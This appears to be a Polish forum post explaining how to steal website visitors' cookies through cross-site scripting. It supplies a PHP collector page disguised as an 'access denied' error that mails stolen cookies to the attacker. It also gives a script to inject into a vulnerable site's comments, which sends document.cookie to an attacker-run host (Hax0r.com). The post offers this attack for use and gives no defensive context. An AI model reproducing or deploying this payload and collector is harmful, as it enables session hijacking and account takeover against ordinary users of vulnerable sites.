Mozesz uzyc XSS =D tylko jest jeden warunek... ta strona musi byc na nia podatna.. =D
Do rzeczy =D
Robisz sobie serwer swoj wlasny np. w serwisie 110mb.com.
robisz plik tekstowy ktory nazywasz cookie.php
w nim ma sie znajdowac taki kod:
Kod:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Błąd</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('[email protected]', 'Ciacha skradzione', $cookies); ?>
<body>
<h2><strong>Błąd</strong> - <strong>Brak dostępu</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>
a na stronke np. w komentarzu czy cos takiego wklepujesz taki kod:
Kod:
<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>
www.HaX0r.com to oczywiscie serwer czy strona zalozona przez ciebie =D
i to wszystko =D